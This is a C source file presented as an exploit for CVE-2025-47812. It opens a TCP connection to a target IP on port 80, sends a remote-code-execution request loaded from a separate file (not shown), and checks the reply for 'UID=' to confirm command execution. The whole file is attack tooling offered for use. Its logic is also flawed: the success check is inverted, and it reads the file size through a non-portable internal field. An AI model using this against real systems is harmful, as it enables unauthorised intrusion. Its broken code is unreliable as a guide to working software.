Exploit_CVE-2025-47812/exploit.c

#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv){
  if (argc != 2){
    printf("u must specifie IP addr\n");
      exit(1);
  }
  printf("target = %s\n", argv[1]);
  int domain = AF_INET;
  int type = SOCK_STREAM;
  int fd = socket(domain, type, 0);
  printf("fd = %d\n", fd);

  struct sockaddr_in dest_addr;
  memset(&dest_addr, 0, sizeof(dest_addr)); 
  dest_addr.sin_family = AF_INET;
  dest_addr.sin_port = htons(80);
  dest_addr.sin_addr.s_addr = inet_addr(argv[1]);

  int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
  printf("ret_connect = %d\n", ret);

  FILE* fichier_out = fopen("request_rce.txt", "r");
  fseek(fichier_out, 0, SEEK_END);

  
  int size = fichier_out->_offset;
  char*	file_buffer = malloc(size);

  fseek(fichier_out, 0, SEEK_SET);
  fread(file_buffer, 1, size, fichier_out);

  for (int i = 0; i < size; i++){
	  char	c = file_buffer[i];
	  if (c == '\n')
		  send(fd, "\r\n", 2, 0);
	  else
		  send(fd, &c, 1, 0);
  }
  send(fd, "\r\n", 2, 0);

  printf("recv:\n");
  char	c = 0;
  int n = 0;
  char* text = calloc(1, 1);
  int len = 0;
  while (( n = recv(fd, &c, 1, 0)) > 0){
	len = strlen(text) + 2;
	text = realloc(text, len);
	text[len - 2] = c;
	text[len - 1] = 0;
  }
  int index = 0;
  while (text[index]){
	if (text[index] == 'U'){
		if (strncmp(text + index, "UID=", 4)){
				printf("pattern found\n");
				break;
		}
	}
	index++;

  }
  fclose(fichier_out);
  free(file_buffer);
  return 0;
}